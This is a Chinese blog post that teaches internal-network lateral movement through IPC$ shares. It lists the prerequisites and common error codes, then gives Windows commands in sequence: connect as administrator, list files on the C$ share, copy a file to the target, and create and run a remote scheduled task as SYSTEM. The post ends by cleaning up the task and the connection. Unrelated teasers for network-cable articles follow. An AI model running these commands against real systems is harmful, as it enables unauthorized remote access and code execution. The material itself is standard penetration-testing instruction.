百度360必应搜狗淘宝本站头条
ug5 0软件免费下载右键菜单清理flac文件grub4doss spline
当前位置:网站首页 > 技术文章 > 正文

内网渗透-IPC$横向控制OA系统「网络安全」

cac55 2025-04-01 16:11 40 浏览 0 评论

IPC$介绍

IPC(Internet ProcessConnection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过ipc$,可以与目标机器建立连接。

利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。

配套教程:内网渗透-IPC$横向控制OA系统【关注我,私信回复“资料”获取】

首先,需要建立一个ipc$

net use \\192.168.18.10\ipc$"密码" /user:administrator

net use

IPC$利用条件

1、开启了139、445端口
ipcs可以实现远程登录及对默认共享资源的访问,而139端口的开启表示NetBIOS协议的应用。通过139、445(Windows2000)端口,可以实现对共享文件打印机的访问。因此,一般来讲,ipcs需要139、445端口的支持。
2、管理员开启了默认共享
默认共享是为了方便管理员进行远程管理而默认开启 的,包括所有的逻辑盘(c、d、d、e等和系统目录winnt或windows(adminS)通过ipc等和系统目录winntwindows(adminS)通过ipc,可以实现对这些默认共享目录的访问。

IPC$连接失败原因

①用户名或密码错误
②目标没有打开ipcs默认共享
③不能成功连接目标的139、445端口

IPC$连接常见错误

错误信息

原因

错误号5

拒绝访问

错误号51

Windows无法找到网络路径,即网络中存在问题

错误号53

找不到网络路径,包括IP地址错误、目标未开机、目标的lanmanserver服务未启动目标有防火墙(端口过滤)

错误号67

找不到网络名,包括lanmanworkstation服务未启动、ipcs已被删除

错误号1219

提供的凭据与已存在的凭据集冲突。例如,已经和目标建立了ipcs,需要在删除原连接后重新进行连接

错误号1326

未知的用户名或错误的密码。

错误号l792

试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动(连接域控制器时会出现此情况)

错误号2242

此用户的密码已经过期。例如,目标机器设置了账号管理策略,强制用户定期修改密码

利用方式-windows自带命令

dir命令

在使用netuse命令与远程目标机器建立ipcs后,可以使用dir命令列出远程主机中的文件,如图

dir  \\192.168.18.10\c$

tasklist命令

在使用net use命令与远程目标机器建立ipcs后,可以使用tasklist命令的/S、/U/P参数列出远程主机上运行的进程

tasklist  /s192.168.18.10

利用方式-schtasks

(1)查看系统时间

net  time  \\IP地址


(2)复制文件

copy   文件  \\IP地址\C$


(3)创建计划任务

schtasks  /create /s  IP地址  /tn  计划任务名  /sc onstart /tr c:\文件/ru system  /f


(4)执行计划任务

schtasks  /run  /s IP地址 /i /tn "计划任务名"


(5)删除计划任务

schtasks  /delete  /s  IP地址  /tn "计划任务名"  /f


(6)清除IPC连接

net use \\IP /del /y

总结

单看文字教程可能大部分小伙伴一脸懵,特奉上视频教程
配套教程:内网渗透-IPC$横向控制OA系统【关注我,私信回复“资料”获取】


相关推荐

毕亚兹CAT6六类千兆网线,快的不止一点点

相信大家在使用过程中都有这样的感触,使用笔记本连接WiFI虽然没有线的束缚,移动更方便,但在信号的稳定性上却相当打折扣。特别一些百兆路由器,WiFi信号在穿墙之后就衰减的特别厉害。为了让日常使用更为省...

千兆网有必要用超六类网线吗(千兆网有必要用超六类网线吗?)

在千兆网络中是否需要使用超六类网线(Cat6a),需结合具体需求和场景综合判断:一、超六类网线的优势更高的性能传输频率达500MHz,支持10Gbps速率(远超千兆需求),未来升级万兆无需换线。...

网线1-8芯都通,线序也正常!测线器显示一千兆

这是什么操作?疑似不会打水晶头?当客户说要我把这根线换了的时候,小脑都干萎缩了。大家好,我是沈阳穿线大神。客户说家里网速从装修后就没达标过,一度怀疑是网线不太好。当上门打开多媒体箱一看,线路确实不太好...

千兆网线VS百兆网线:性能对比与选择指南

千兆网线vs百兆网线:性能对比与选择指南在现代网络中,千兆以太网和百兆以太网是两种常见的有线局域网(LAN)标准。接下来将对千兆网线和百兆网线进行性能对比,并提供一个选择指南,帮助大家更好地理解它们的...

入户弱电箱到电视柜只有一根网线?单线复用跑不满千兆?

今天根据预约前往徐汇区某客户家上门升级网线。上门前已与客户沟通得知已有两波人马上门无法解决问题。到现场勘察网络结构。客户家入户办理的是电信的千兆宽带。弱电箱到电视柜只有一根网线,所以客户找朋友帮他...

网线选择指南:千兆网不是开玩笑,升级你的网线吧!

想给家里拉网线,却被网线种类搞晕了?不用担心,小编来帮你梳理一下!,你是否曾经为家里的网线选择而犯愁?不用担心,这篇文章将为你梳理一下各类网线的区别,让你轻松选出最适合你的网线。五类线传输速率仅为百兆...

科普 | 网线数据传输最远距离(网线传输距离最远多长信号稳定)

了解过网线的用户都知道,双绞线有一个“无法逾越”的“100米”传输距离,无论是哪一类的网线,即便是百兆网线、千兆网线、万兆网线,最远的传输距离都是一样的100米,而且在综合布线规范中,也明确要求水平布...

网线做1236有效距离能传输多远?(网线1236接法有顺序吗)

我们用的网线标准接法是T568B的线序来接入水晶头,按照标准接法,我们按顺序接入网线的8根线芯。网线使用1236编号的芯线传输数据,也就是1.2用于发送,3.6用于接收(来自线缆博士),另外四根线45...

3招辨别百兆网线和千兆网线?(如何区别百兆和千兆网线)

网线是连接局域网必不可少的,但是现在人们对网速的要求越来越高,网线也有了不同的分类,常见的有五类线、超五类线、六类线、七类线等,但我们不懂行的人可能就只知道百兆网线与千兆网线,那么这两种网线有什么不同...

网线8芯线各自作用是什么?几种常用的网线定义行业标准

许多朋友都遇到过网线装宽带时选择网线类型的问题,以及家里装修时需要铺设网线如何选择的问题等。那么网线到底是选择8芯的还是4芯的呢?8芯网线的每个芯都用到了吗?每芯的作用又是什么呢?接下来在这里分享8芯...

网线水晶头还有大小之分?超六类网线能插超五类的水晶头吗?

不知道大家有没有做过这种蠢事呢?前不久绿豆就有朋友干过让人啼笑皆非的事情。他为了把家里闲置网线利用起来,连接笔记本使用。结果从网上买了水晶头后怎么插都插不进去,后来才知道原来是买错了。网线是超六类线,...

超五类网线能支持千兆网络吗?(超五类网线能支持千兆网络吗怎么设置)

超五类非屏蔽网线是在对现有的五类屏蔽双绞线的部分性能加以改善后出现的电缆,不少性能参数,比如近端串扰、衰减串扰比,回波损耗等有所提高。但目前来说,超五类网线的传输带宽仍然为100MHz。虽然超五类非屏...

4种方法快速鉴别百兆/千兆/万兆网线

在购买网线时,我们经常会遇到百兆/千兆/万兆的疑惑,想买的网线到底是属于哪一种?本文将围绕4种鉴别方式,更快让用户能够分清楚这三种常规区别。一、看网线护套上的英文标识这是最简单也是最快速的判别方式,下...

我们做事要想快速成功,首先就得看教程,才会事半功倍

我们做事要想快速成功,首先就得看教程,才会事半功倍要想快速解决问题,还是要先看教程,学习别人成功的路子,往往就会事半功倍,容易成功,千万不要自己钻研。比如,有人自己修网络,弄了一天,也没修好。会修网的...

百兆网线和千兆网线有什么区别(百兆网线和千兆网线速度有多大区别)

百兆和千兆主要指的是我们在使用的网络中的传输速度。百兆和千兆的区别指的就是他们的带宽问题,也就是能允许多大的数据量通过。百兆网线和千兆网线指的是可以满足百兆网络和千兆网络的传输速度的线缆。一般来说,百...

取消回复欢迎 发表评论:

一周热门
最近发表
标签列表